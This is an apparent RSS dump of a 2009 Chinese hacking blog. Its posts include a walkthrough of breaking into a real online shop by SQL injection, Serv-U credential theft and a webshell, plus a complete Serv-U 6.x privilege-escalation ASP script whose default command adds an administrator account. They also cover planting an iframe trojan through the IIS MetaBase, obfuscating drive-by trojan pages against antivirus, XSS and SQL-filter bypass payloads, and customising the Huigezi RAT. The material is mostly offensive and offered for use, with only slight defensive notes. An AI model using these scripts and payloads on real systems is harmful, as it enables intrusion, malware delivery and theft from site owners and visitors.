<![CDATA[设计碎片]]> http://blog.edotpower.com/ zh-cn PBlog2 v2.4 设计碎片 http://blog.edotpower.com/images/logos.gif http://blog.edotpower.com/ 设计碎片 http://blog.edotpower.com/default.asp?id=159 <![CDATA[一种特殊的Iframe挂马的解决方法]]> star520dust@163.com(stardust) Tue,23 Jun 2009 15:47:47 +0800 http://blog.edotpower.com/default.asp?id=159

今天访问公司的一个网站,突然发现网页显示不对,右键查看HTML代码,发现iframe了一个网站的js文件,不用说,肯定被挂马了。

进入服务器,看了下文件源代码里并没有这个iframe的代码,但整个服务器的所有网站访问后代码里都自动加了这个iframe代码。

我第一反应会不会是IIS映射被修改了啊,查看了下

config

里面也没什么被修改的

突然我想起以前大学的时候,学校网站也出现过这个问题,是当时疯狂的ARP病毒引起的,就是不是本机有病毒,网络中有混杂模式的机子。于是我想建议装一个ARP防火墙。网络上搜了下,说也可能是IIS里WEB服务扩展引起的,于是我又看了下,发现没什么问题。

最后我突然发现一个地方,有异常,就是这里,让我暂时解决了这个问题(可能系统中有DLL或EXE文件病毒了,还要系统杀毒才行,服务器不是我管,我也只能干着急了。)

如下图:

iismuma

启动文档页脚,这里附加了一个htm文件,我用文本文档打开c:\windows\system32\com\iis.htm,发现里面就是这个 iframe的代码,而且这个htm正常情况也是没有的,于是我把起用文档页脚去掉,把这个htm文件删了,问题就暂时解决了(因为可能系统还有病毒,所 以算暂时解决吧)

网上很多人说自己服务器中了ARP病毒攻击,IIS尾巴之类的,如果都没能解决,请注意看下起用文档这个地方,希望对你有帮助。

以前也玩过一段时间马,不过好久没碰这些了,根据这个js文件,我找到了很多htm文件,都是病毒网站上的,我下载下来了,有空要好好分析分析,如果闲得慌,给他服务器扫描扫描,帮他服务器找找后门:)

------------------------------

刚刚看了下,原来做这种木马只需要在C:\WINDOWS\system32\inetsrv\MetaBase.xml插入一段代码就行了(C是系统盘),比如:

<IIsWebVirtualDir Location ="/LM/W3SVC/81120797/root"
AccessFlags="AccessRead | AccessScript"
AppFriendlyName="默认应用程序"
AppIsolated="2"
AppRoot="/LM/W3SVC/81120797/Root"
AuthFlags="AuthAnonymous | AuthNTLM"
DefaultDocFooter="FILE:C:\WINDOWS\system32\Com\aa.htm"

如上,在DefaultDocFooter="FILE:C:\WINDOWS\system32\Com\aa.htm"插入有木马的htm文件就行了,没什么难度,不过知道原理后,自己不要做破坏就行了。:)

]]> http://blog.edotpower.com/default.asp?id=158 <![CDATA[sql注入的一些新发现,突破关键字过滤]]> star520dust@163.com(stardust) Tue,23 Jun 2009 15:43:14 +0800 http://blog.edotpower.com/default.asp?id=158 一直以来都以为只有空格,tab键和注释符/**/可以用来切割sql关键字,段时间在邪八看了风迅cms注入漏洞那篇帖子,才知道原来回车也可以 用来作为分割符(以前竟然没有想到,真是失败)。回车的ascii码是chr(13)&chr(10),至于为什么要两个连在一起,这个我也不知 道。转换成url编码形式是%0d%0a,于是就可以用%0d%0a代替空格pass一些过滤空格的检查了。

引申一下,只用%0d能正常执行语句吗?只用%0a呢?测试证明,用任意一种分割在mssql、mysql和access里面都是可以的。
另外,关于mssql的多语句问题。我以前一直以为必须用分号作为语句的结尾,后来发现,完全不是那样。类似

select * from table exec xp_cmdshell'xxxxxxxxxx'

select * from table/**/exec xp_cmdshell'xxxxxxxxxx'

select * from table|---tab---|exec xp_cmdshell'xxxxxxxxxx'

select * from table|---enter---|exec xp_cmdshell'xxxxxxxxxx'

的语句都是可以正常执行的。而我以前竟然一直不知道!不过这个貌似跟连接数据库驱动有关系,odbc可以正常执行,sqloledb的话就会报错。有兴趣的继续研究吧

这样,以后遇到带空格过滤关键字的拦截程序,又可以发挥发挥了。可能大家早就知道了,不管怎么说,发在这里吧!

最近想起可能还有些ascii码可以用来在sql语句中代替空格,于是写个脚本测试了一下,结果在所有128个低位ascii字符 中,chr(12)也可以在access里用,不过貌似chr(12)不能出现在and、or之类的关键词附近,原因不清楚。mysql中比access 多一个chr(11)可以。至于mssql,挖日,直接从1到32的ascii码换成字符后都可以正常使用。

]]> http://blog.edotpower.com/default.asp?id=157 <![CDATA[利用serv-u拿下网上商城]]> star520dust@163.com(stardust) Tue,23 Jun 2009 14:46:55 +0800 http://blog.edotpower.com/default.asp?id=157 注:文章已经发表于2006年第8期《黑客手册》,后由原创作者友情提交到邪恶八进制论坛,转载请著名原始出处《黑客手册》。

今天,渗透的是一家性用品商城,网站用的全是php程序,对于php构建的系统,一般后台数据库都是mysql,就像asp对应着mssql和一样,由于 php的特性(php默认将传递参数中的“‘”等字符做了转换,所以对于字符类型的变量默认情况下很难注入),一般情况下我们注入的只能是数字类型的变量,根据平时注入的知识,我们知道id=xxx的连接就有可能找到漏洞!

一、寻找注入点
首先,在主站上转悠了一圈,主站中的数字类型变量不存在注入漏洞,提交http://www.XXX.com/view.php?id=1250 and 1=1和 1=2 ,在网页里把and 1=1和and 1=2都正常返回。

图1 主站不存在注入点
显然是做了过滤,因为网站二级页面也是php程序写的,所以我就想先从二级页面入手,进入了一个二级页面,好像是性图书联盟,这种东西害了多少青少年啊,今天就先拿你开刀,免得再腐蚀青少年的思想,随便打开了一个数字类型变量的页面
http://shu.XXX.com/book_view.php?id=339,提交
http://shu.XXX.com/book_view.php?id=339 and 1=1,返回正常页面,提交
http://shu.XXX.com/book_view.php?id=339 and 1=2,没有返回数据, 果然存在注入漏洞,手工来解决吧,手工注入更有助php注入的学习,提交http://shu.XXX.com/book_view.php?id=339 order by 20,页面正常返回,提交
http://shu.XXX.com/book_view.php?id=339 order by 10,没有返回数据, 说明字段数在10和20之间,接着试提交http://shu.XXX.com/book_view.php?id=339 order by 15也是正常的,说明字段数在15和20之间,当我提交到18时,页面没有数据返回,说明字段数是17,18左右,接着提交http://shu.XXX.com/book_view.php?id=339 and 1=2 union select 1,2,4,5,6,7,8,9,10
,11,12,13,14,15,16,17/*,返回结果

图2 性图书联盟的注入点
确定了字段数是17个。下面接着提交http://shu.XXX.com/book_view.php?id=339 and 1=2 union select 1,version(), database(),4,5,6,7,8,user(),10,11,12,13,14,15,16,17/*,返回结果

图3 查询数据库的信息
现在我们完成了对数据库系统的探测。因为我们有可能不是root权限,并且数据库和web服务器可能不在同一台主机上,这样我们就没有读取文件的权限了,测试下再说,先看下是用的什么系统,如果是Linux,可以提交etc/passwd,如果是windows,可以提交c:\\boot.ini,成功读取出了c:\\boot.ini文件内容,可以读取文件内容,主机用的是windows 系统,还是windows2003。

图4 查询服务器的信息
下面再来猜后台,先猜出后台再说,因为很多时候猜出了用户名和密码,最后却找不到后台登录的地方。先试了几个常见的,admin、manage、 admin、php、manage、php、login、admin_index.php,结果都没找到。我想应该是管理员把后台改了,但是一般管理员不会改的很复杂,我就在一些常用的后台上加了些数字,例如:admin123、admin123456、admin88、admin888、 manage888,我就依次试了试,结果后台出来了,真是黄天不负有心天啊!http://shu.XXX.com/admin888/admin_login.php,

图5 性图书联盟的后台登录地址
接下来,我们该猜解管理员表名,用户名,密码了,常见的都试了一遍,例如:user、admin、manage,password、pass、login,一个都没有,用工具也试了一遍,也没找出来,入侵陷入困难,看看时间,也该睡了,养好精神明天再接着渗透。

二、利用serv-u用户信息配置文件拿webshell
第二天上课时,手里刚好有本《黑客手册》第3期,反正课也无聊,我就开始看《黑客手册》,Q版黑客栏目里一篇文章,《从万象VOD视频点播到FTP密码》给了我启发,既然我没有办法猜到表名,可以试试文章里的方法啊,它也是windows系统,而且可以读取系统文件内容,如果管理员没有改变serv-u的安装路径,那我就可以像文章里说的,先读取serv-u用户信息配置文件ServUDaemon.ini中的内容,然后再猜解加密密码,如果能猜出密码,就可以成功拿到网站的权限了。
课一上完,我就回到寝室,马上打开电脑,先对网站进行了一次扫描,服务器开了只开了21、80端口,我用ftp shu.XXX.com,连上去看了下,果然用的是serv-u,而且是6.0版本的,那我先试试,看serv-u是不是在默认的安装路径
C:\\Program Files\\serv-u\\ServUDaemon.ini, 在地址栏提交
http://shu.XXX.com/book_view.php?id=339 and 1=2 union select 1,2,3,4,5,6,7,8,load_file(char (67,58,92,92,80,114,111,103,114,97,109,32,70,105,108,101,115,92,92,115,101,114,118,45,117,92,92,83, 101,114,118, 85,68,97,101,109,111,110,46,105,110,105)),10,11,12,13,14,15,16,17/*,没想到真是安装在默认路径,读取出了serv-u的用户信息配置文件内容,

图6 服务器serv-u的用户信息配置文件
只有三个用户,马上把内容复制到本地,打开serv-u纯数字密码破解器,立刻破解,没想到只用了不到一分钟,我就破解出了一个用户的密码,是纯数字的,密码是321321,用户的默认路径是e:\shu_XXX_com,应该是存放网站的路径,马上拿出Flashxp连上去,果然是存放这个二级网站的目录

图7,性图书联盟的FTP目录
马上上传了一个php一句话木马,在浏览器中打开php木马,

图8 成功拿到二级页面性图书联盟的webshell
网站的webshell拿到了,真是爽啊,今天运气真的不错,呵呵。

三、提升权限,攻下服务器
拿到webshell了,再接再厉,继续扩大战果,看能不能攻下服务器,因为刚开始我就结整个网站扫描了下,主站是另外的服务器,其它的二级网站都是放在一台服务器上,就在这个服务器上,如果能攻下这台服务器,那就能拿下所有的二级网站了。首先看了下开的服务,第三方软件有serv-u,mysql。提权的方法有几种,我试了下,serv-u存在本地堤权,mysql数据库用的root用户连接的,可以读取密码,然后以系统权限执行命令。这些方法网上讲的很多了,我就不说详细说了(不想浪费黑客手册的版面),呵呵。拿到服务器后我大致看了下,这台服务器上放了这个网站所有的二级页面,有10个站点,关于网站问题,我已经通知了管理员修补注入点了。

四、渗透总结
这次入侵没用到什么新技术,全是一些常用的php注入方法,当猜不到表名时,可以试试其它方法,因为到达终点站的路不只一条,条条大路通罗马。我们注入、猜解的目的还不是为了得到管理员用户和密码,然后进后台拿webshell。但是如果猜不出表名时,我们可以试试其它的方法,只要能拿到webshell。在入侵中最重要的是思维,光学会使用工具是没用的,要有灵活的思维,思维是非常重要的,因为人的思维是一切的根源。希望这篇文章能给大家一点启发,遇到困难多思考。

]]> http://blog.edotpower.com/default.asp?id=156 <![CDATA[Serv-U 6.X 提权脚本]]> star520dust@163.com(stardust) Tue,23 Jun 2009 14:34:16 +0800 http://blog.edotpower.com/default.asp?id=156
<%@ LANGUAGE = VBScript %>
<%
Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
dim action
action=request("action")
if not isnumeric(action) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(request("port"))
cmd = trim(request("c"))
f=trim(request("f"))
if f="" then
f=gpath()
else
f=left(f,2)
end if
ftpport = ffport
timeout=3

loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DeleteDOMAIN" & vbCrLf & "-IP=" & iip & vbCrLf & " PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=leaves|" & iip & "|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=luo" & vbCrLf & "-Password=ye" & vbCrLf & _
"-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
"-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
newuser=replace(newuser,"c:",f)
select case action
case 1
set a=Server.CreateObject("Microsoft.XMLHTTP")
a.open "GET", "http://127.0.0.1:" & port & "/leaves/upadmin/s1",True, "", ""
a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
set session("a")=a
%>
<form method="post" name="leaves">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="2"></form>
<script language="javascript">
document.write('<center>正在连接 127.0.0.1:<%=port%>,使用用户名: <%=user%>,口令:<%=pass%>...<center>');
setTimeout("document.all.leaves.submit();",4000);
</script>
<%
case 2
set b=Server.CreateObject("Microsoft.XMLHTTP")
b.open "GET", "http://127.0.0.1:" & ftpport & "/leaves/upadmin/s2", True, "", ""
b.send "User luo" & vbCrLf & "pass ye" & vbCrLf & "site exec " & cmd & vbCrLf & quit
set session("b")=b
%>
<form method="post" name="leaves">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="3"></form>
<script language="javascript">
document.write('<center>正在提升权限,请等待...,<center>');
setTimeout("document.all.leaves.submit();",4000);
</script>
<%
case 3
set c=Server.CreateObject("Microsoft.XMLHTTP")
c.open "GET", "http://127.0.0.1:" & port & "/leaves/upadmin/s3", True, "", ""
c.send loginuser & loginpass & mt & deldomain & quit
set session("c")=c
%>
<center>提权完毕,已执行了命令:
<font color=red><%=cmd%></font>

<input type=button value=" 返回继续 " onClick="location.href='<%=gname()%>';">
</center>

<%
case else
on error resume next
set a=session("a")
set b=session("b")
set c=session("c")
a.abort
Set a = Nothing
b.abort
Set b = Nothing
c.abort
Set c = Nothing
%>
<center><form method="post" name="leaves">
<tr align="center" valign="middle">
<td colspan="2">Serv-U 6.X 提权脚本 by 落叶纷飞【S.S.T】 @ 肇庆</td>

</tr>
<tr align="center" valign="middle">
<td width="200">用户名:</td>

<td width="400"><input name="u" type="text" id="u" value="LocalAdministrator"></td>

</tr>
<tr align="center" valign="middle">
<td>口 令:</td>

<td><input name="p" type="text" id="p" value="#l@$ak#.lk;0@P"></td>

</tr>
<tr align="center" valign="middle">
<td>端 口:</td>

<td><input name="port" type="text" id="port" value="43958"></td>

服务器端口:

<td><input name="ffport" type="text" id="ffport" value="65500"></td>

服务器IP:

<td><input name="iip" type="text" id="iip" value="0.0.0.0"></td>

</tr>
<tr align="center" valign="middle">
<td>系统路径:</td>

<td><input name="f" type="text" id="f" value="<%=f%>" size="8"></td>

</tr>
<tr align="center" valign="middle">
<td>命 令:</td>

<td><input name="c" type="text" id="c" value="cmd /c net user leaves cnsst /add & net localgroup administrators leaves /add" size="50"></td>

</tr>
<tr align="center" valign="middle">
<td colspan="2"><input type="submit" name="Submit" value="提交">
<input type="reset" name="Submit2" value="重置">
<input name="action" type="hidden" id="action" value="1"></td>
</tr>
</form></center>

使用方法:如果是6.4以下的保持默认即可,只要按你的需要修改执行的命令即可!如果为6.4请在“服务器端口”里填21,然后再在“服务器IP”中填写服务器的真实IP。
<% end select
function Gpath()
on error resume next
err.clear
set f=Server.CreateObject("Scripting.FileSystemObject")
if err.number>0 then
gpath="c:"
exit function
end if
gpath=f.GetSpecialFolder(0)
gpath=lcase(left(gpath,2))
set f=nothing
end function
Function GName()
If request.servervariables("SERVER_PORT")="80" Then
GName="http://" & request.servervariables("server_name")&lcase(request.servervariables("script_name"))
Else
GName="http://" & request.servervariables("server_name")&":"&request.servervariables("SERVER_PORT")&lcase(request.servervariables("script_name"))
End If
End Function
%>

]]> http://blog.edotpower.com/default.asp?id=155 <![CDATA[教你如何在网页木马中加密代码(图)]]> star520dust@163.com(stardust) Wed,10 Jun 2009 23:28:42 +0800 http://blog.edotpower.com/default.asp?id=155   对挂马网页进行加密是黑客经常用的手段,这种手段能够躲避杀毒软件的追杀,因此近年来黑客在进行网页挂马时,通常会选择将已经做好的网页代码进行二次加密甚至多次加密。
  早期黑客多数都只采用简单的Unicode转码来实现加密,但是采用这种加密方式的网页很快就被杀毒软件查杀了,无法再有效地起到免杀作用,因此网页加密也开始逐步升级花样百出,从Escape可转换编码加密到转义字符加密,最后发展到自定义函数来进行加密。
 
  安全百科:Escape是一个存在于JavaScript、VBS等脚本语言中的函数,在JavaScript中,Escape函数起着让一些非英语字符在传递过程中进行重新编码再传递的作用。
  网页木马为什么要加密
  网页木马人人恨,杀毒软件对它也是非常关注,也会采取各种防范手段。网页木马的传播就受到限制,为了更好地生存,为了不被杀毒软件等安全工具发现,很多黑客对网页木马进行了加密,增加了杀毒软件查杀的难度,提高了网页木马的生存率。因此,主流的网页木马都是进行过加密的。
  网页木马加密的种类有许多,多数都是利用网页代码各个标准互相转换的特点,进行编码的转换加密,这种加密方式在某种意义上,只是干扰了依靠特征码辨识网页木马的杀毒软件的识别,但并没有将自己加密。因此,现在比较高级的加密手段是在编写脚本语言的时候自己进行函数的定义,然后再进行字符串加密,多制造一些让杀毒软件混乱的门槛,从而让它们无从辨别。
  用字符转换的方式进行加密,就如同我们用中文对一个翻译讲话一样,我们计算机就是这个精通许多语言的翻译,我们将一句话告诉这个翻译,这个翻译随后用英语将这段话抄了下来,然后又用替换密码将这段英文进行简单的替换,最后再将这段英文用莫尔斯电码发送给另外一个能够解密的翻译。
  由于整个过程使用的都只是基本的代码转换,因此任何一个懂英语会莫尔斯电码并了解英文替换密码的人都能够解开这个密码,但是对于不会英语或者不会发电报的人而言,这已经是非常费解的东西了。下面,我们以当前黑客最常用的Escape加密方法为例,剖析网页木马加密的方式和防范方法。
  安全八卦:在密码学的历史上,最有名的替换密码工具是二战时期德军使用的代号为“Enigma”的密码机,Enigma在二战时为德军的闪电战和德国海军的“群狼”潜艇战提供了绝佳的通讯保密措施。为了能够解密Enigma,盟军在英国专门建立破译中心,而在这个中心中诞生了世界上第一台计算机,20世纪最伟大的计算机之父阿兰·图灵就是在破解Enigma的时候产生了许多现代计算机雏形的理论。
  网页木马加密/解密实录
  攻
  首先编写需要加密的HTML代码,这里选用以下IFRAME框架挂马中的代码:
 
  然后登录转换网站http://tool.chinaz.com。
  在网页中找到“代码转换工具”,然后点击选择下拉菜单中的“URL16进制加密”一项,之后将木马网页链接地址 http://soft.yesky.com输入到地址栏中,点击“加密”后为http://%73%6F%66%74%2E%79%65%73%6B%79%2E%63%6F%6D/ (图1)。
 


  接着,将加密后的网址粘贴回原来的IFRAME代码中:
http://%73%6F%66%74%2E%79%65%73%6B%79%2E%63%6F%6D/ width=400 height=300>
  再点击“代码转换工具”菜单中的“Encode加密/解密工具”,将IFRAME代码复制到输入框中,点击“Encode加密”,得到加密后的代码:%3Ciframe+src%3D+http%3A%2F%2F%2573%256F%2566%2574%252E%2579%2565%2573%256B%2579%252E%2563%256F%256D%2F+width%3D400+height%3D300%3E%3C%2Fiframe%3E+
(图2)。
  然后,打开写字板程序,将下列代码输入到写字板中,并将加密代码复制到指定位置:
<SCRIPT LANGUAGE="Javascript"><!——
  var Words ="把加密生成后的代码复制到此处就 OK 了!"
  function OutWord()
  {
  var NewWords;
  NewWords = unescape(Words)
  document.write(NewWords);
  }
  OutWord();
  // ——>
  </SCRIPT>


 
  最后,点击“代码转换工具”菜单中的“JS方式加密/解密”,将修改完成的JavaScript代码复制到输入框中,然后点击“JS加密”,完成代码加密过程(图3),再将加密后的代码放入到希望插入木马的网页中即可。以后,当用户访问该网站时,就会激活木马。
 

 
  防
  安全工程师碰到加密的恶意网页时,同样进入转换网站,然后将那些复杂的代码粘贴到解密的输入框中,再点击“解密”按钮即可解出原文。但是需要注意的是,由于解密涉及到不同的字符编码之间的转换,因此在解密过程中一定要抓住不同编码的特点,例如Escape编码中,通常会以“%”作为开头,在将中文转换为Escape编码后,往往是“%”后面紧跟着小写字母“u”,接下来是4位字母,它们就是16进制的字符。
  一般用户要防范加密过的恶意网页,最好的方法是开启杀毒软件中的脚本过滤功能,或者在IE浏览器“Internet选项”中的“高级”标签中选择“禁用脚本调试”。此外JS加密和URL16进制加密有时在火狐浏览器中会被自动屏蔽,在浏览自己怀疑有危险的网页时,可以选择火狐浏览器。
]]> http://blog.edotpower.com/default.asp?id=154 <![CDATA[教你插入XSS代码的方法]]> star520dust@163.com(stardust) Wed,10 Jun 2009 23:17:27 +0800 http://blog.edotpower.com/default.asp?id=154 1.脚本插入
(1)插入javascript和vbscript正常字符。

例1:<img src="javascript:alert(/xss/)">
例2:<table background="javascript:alert(/xss/)"></table>'/在表格中插入脚本
例3:<img src="vbscript:msgbox(&quot;a&quot;)">

(2)转换字符类型。将javascript或vbscript中的任一个或全部字符转换为十进制或十六进制字符

例1:<img src="&#106;avascript:alert(/xss/)"> '/将j字符转为十进制字符&#106; 。

例2:<img src="&#x6A;avascript:alert(/xss/)"> '/将j字符转为十六进制字符&#x6A; 。
(3)插入混淆字符。在系统控制字符中,除了头部的&#00(null)和尾部的&#127(del)外,其他31个字符均可作为混淆字符,比如&#01、&#02等字符都可插入到javascript或vbscript的头部,其中Tab符&#9、换行符&#10、回车符&#13还可以插入到代码中任意地方。
例1:<img src="&#01;javascript:alert(/a/)"> '/插入到代码头部,其中&#01;可写成&#1,效果一样
例2:<img src="java&#09;scr&#10;ipt:alert(/a/)"> '/插入到代码中任意位置,其中&#09;可写成&#9

例3:<IMG SRC="jav&#xd;ascript:alert('XSS')"> '/&#xd;是回车符的16进制形式

例4:<IMG SRC="jav&#xa;ascript:alert('XSS')"> '/&#xa;是换行符的16进制形式
2.样式表
(1)利用CSS代码@import、expression触发XSS漏洞。
例1:@import "http://web/xss.css"; '导入外部带有XSS代码的CSS样式表。
例2:@import'javascript:alert("xss")'; '调用javascript脚本触发漏洞
例3:body{xss:expression(alert('xss'))} '在内部样式表中加入expression事件
例4:<img style="xss:expression(alert(&quot;xss&quot;))">'在内嵌样式表中加入expression事件
(2)在CSS代码中加入javascript和vbscript脚本
例1:body{background-image:url(javascript:alert("xss"))}
例2:body{background-image:url(vbscript:msgbox("xss"))}
(3)转换字符类型,以十六进制字符替换其中或全部的字符:
例1:@\0069mport:url(web/1.css);'//将其中的i转为\0069
例2:body{xss:\0065xpression(alert('xss'))}'//将e转换为\0065
例3:body{background-image:\0075\0072\006c...}'将url全转为16进制
(4)插入混淆字符,在css中,/**/是注释字符,除了/**/外,字符"\"和结束符"\0"也是被忽略的,可以用来混淆字符。
例1:@\0im\port'\0ja\vasc\ript:alert("xss")';
例2:@\i\0m\00p\000o\0000\00000r\000000t"url";

]]> http://blog.edotpower.com/default.asp?id=153 <![CDATA[XSS下的绕过过滤教程(图)]]> star520dust@163.com(stardust) Wed,10 Jun 2009 23:15:59 +0800 http://blog.edotpower.com/default.asp?id=153 很多网站为了避免XSS的攻击,对用户的输入都采取了过滤,最常见的就是对转换成,经过转换以后虽然可在正确显示在页面上,但是已经不能构成代码语句了。这个貌似很彻底,因为一旦被转换掉,什么就会转换成“”,不能执行,因此,很多人认为只要用户的输入没有构成,就不能闭合前后的标签,其语句当然也不会有害。
但是,万事总有可能,只要有一定的条件,我们就可以构造经过编码后的语句来进行XSS。
1. 转义字符
首先要认识一下“\”,这个不是斜杠么。对的,斜杠在JAVASCRIPT有着特殊的用途,它是转义的符号。例如,我们把我们XSS语句转换成16进制,这里是alert(‘poruin’),我用在CHA88那里淘过来的脚本工具来转换,如图:


 
 
结果如下
\x3C\x73\x63\x72\x69\x70\x74\x3E\x61\x6C\x65\x72\x74\x28\x27\x70\x6F\x72\x75\x69\x6E\x27\x29\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E
这些就是经过编码后的字符,因为前面的斜杠缘故,所以后面的这些字符在JAVASCRIPT中都会被还原。
我们再来看一下测试用的index.asp
if request("text1") "" then
a=replace(replace(request("text1"),"",">")
end if
%>
a=""
document.write(a)
很简单的内容,接受用户的数据后过滤,再用JAVASCRIPT显示出来,直接输入XSS的测试语句看看,被转换掉了吧。再来输入经过16进制转换后的字符,这些字符都可以轻松的逃过过滤,完整进入代码中,经过JAVASCRIPT还原之后,正确解释出来,如图
 


 
而不但是十六进制可以,八进制同样奏效,转换后代码如下:
\74\163\143\162\151\160\164\76\141\154\145\162\164\50\47\160\157\162\165\151\156\47\51\74\57\163\143\162\151\160\164\76
二.UBB标签
UBB标签是目前广泛运用到论坛,留言簿,以及其他网站系统的一种编码标签,类似这样的,用户在中间输入地址后即可,在发表的时候系统会自动改成。这个URL就是用户输入的图片地址,XSS攻击中,可以利用这个特点来达到无需用户输入就能执行由用户所输入的代码,我们只要在输入网址的地方输入:
x"/**/onerror="alert('poruin')
那么经过转换后就变成了
在JS中空格可以用/**/转换,如图:
 

 
 
三.JS还原函数
JS中的编码还原函数最常用的就是String.fromCharCode了,这个函数用于ascii码的还原,一般来说,这个函数都要配合EVAL来使用才有效果。
在跨站中,String.fromCharCode主要是使到一些已经被列入黑名单的关键字或语句安全通过检测,把关键字或语句转换成为ASCII码,然后再用String.fromCharCode还原,因为大多数的过滤系统都不会把String.fromCharCode加以过滤,例如关键字alert被过滤掉,那就可以这么利用:
执行效果如上图一样,没有关键字同样执行想要执行的代码。
文章到此大致结束了,要知道在XSS中可以利用绕过过滤的技术远不止这些,毕竟有防自然也会有攻,魔高一尺道高一丈,我写这文章时间很短,都是依靠我自己的理解来写的,有不正确的地方欢迎各位指出,也希望能和一些喜欢脚本安全或者是XSS的朋友一起讨论这方面的内容。
本人的blog是:http://hi.baidu.com/poruin
                                                                     END
                                                                  PoRuin(QQ56189577)
                                                                  2009-4-18
附:解释《淘宝跨站脚本漏洞》最后所留下来给读者的问题
在这篇文章的最后提及到这么一段HTML代码
function show(){  }
tom
浏览器打开,弹出一个框框,内容为1。这段代码看起来就像建立和引用一个函数,但是看看中间的那段被HTML编码的字符,解码后完整代码如下:
function show(){  }
tom
这里就很容易看出来,作者在玩一个填字游戏,和传统的跨站要闭合前后一样,在函数SHOW所引入的字符中也闭合了前面的函数,然后就是自己JAVASCRIPT代码,实现了JS代码的注入。想一下,这种情况是比较容易发生的,只不过是大家比较少想到的地方,我们还在闭合标签的时候,别人就已经开始闭合函数来实现XSS了。延伸一下,既然可以闭合函数,那么其他也自然可以闭合,像下面的语句一样:
执行之后弹出一个无内容的框,然后显示by:poruin几个字 。如图
 


 
正如跨站的特点,只要是输出由用户所输入的数据的地方都有可能存在跨站。]]> http://blog.edotpower.com/default.asp?id=152 <![CDATA[教打造2009个人专版灰鸽子一(图)]]> star520dust@163.com(stardust) Wed,10 Jun 2009 23:06:46 +0800 http://blog.edotpower.com/default.asp?id=152 1)Restorator
         类似EXESCOPE,但在方便性和功能上都远强于EXESCOPE!它也是一个全能型的汉化工具,可以汉化各种语言编的程序,采用方便的拖放式操作来完成资源的导入导出,的确与众不同!
Restorator破解版

2)ResScope或eXeScope
           一个类似 eXeScope 的软件资源分析和编辑工具,功能已超过 eXeScope。它使用内存载入资源分析,所以被分析的程序并未被独占,在分析期间仍可使用;拥有最出色的资源分析技术,内置的文字编辑器与 16 进制编辑器是由较低层的控件编写的,使资源载入更快,编辑更方便...
ResScope破解版

 
3)C32或WinHex
          C32,一款反汇编十六进制工具,免杀中常用的工具~具有如下功能: 快速静态反汇编PE格式文件(Exe、Dll等) 提供Hex文件编辑功能,功能强大 提供内存Dump、内存编辑、PE文件Dump、PE内存ImageSize修正等多种实用功能 提供内存反汇编功能,提供汇编语句直接修改功能,免去OPCode的直接操作的繁琐 提供反汇编语句彩...
C32

 
4)2009灰鸽子脱壳版(大家也可以在网上搜索“HGZ2009脱壳版”下载)
     应该是灰鸽子软件的改版,但今天还是有不少人迷恋它 ~~~
这是自己修改的~你也很快就有了~

 
以上工具,已发在这里: http://bbs.7747.net/read.php?tid=69353
今天大家要做的工作是;下载需要的软件并制作好3张图片。
分辨率:481×226(灰鸽子启动图片 BMP 318KB)
图片001

 
分辨率:218×54(主界面右下角图片 BMP 34.6KB)
图片002

分辨率:446×131(关于~说明图片 BMP 145KB)
图片003

 
※ 图片大小要保持相近~不要超过原来图片!

    (责任编辑:xuejiao0419
]]> http://blog.edotpower.com/default.asp?id=151 <![CDATA[黑客入侵前的准备工作(图)]]> star520dust@163.com(stardust) Wed,10 Jun 2009 22:53:21 +0800 http://blog.edotpower.com/default.asp?id=151 通常来讲,除了傻瓜黑客外,真正的黑客在进行攻击前总会花很多时间和精力去搜集目标主机的相关信息,比如对方使用的什么操作系统、管理员账号是否为空口令或者弱口令、系统是否存在某些严重的漏洞……掌握了这些信息,攻击成功又多了几分胜算。越成熟的黑客花费在信息搜索上的时间往往越多,信息搜集、筛选、分析……这是最枯燥却也是最重要的工作,那么黑客是如何进行这些信息搜集工作的呢?
  一、巧用工具 轻松探测操作系统版本
  X-Scan是一款功能比较全面的扫描器程序,扫描器是黑客兵器库中不可或缺的一部分,有了它的帮助,“黑客”们就会如虎添翼。扫描器不同于一些常见的攻击工具,它只能用来发现问题,而不能直接攻击目标机器,通过执行如下操作,可以完成远程电脑的操作系统探测:
  第1步:首先,至国内的著名安全网站“安全焦点”“http://www.xfocus.net/tools/200507/1057.html”下载X-Scan 中文版。
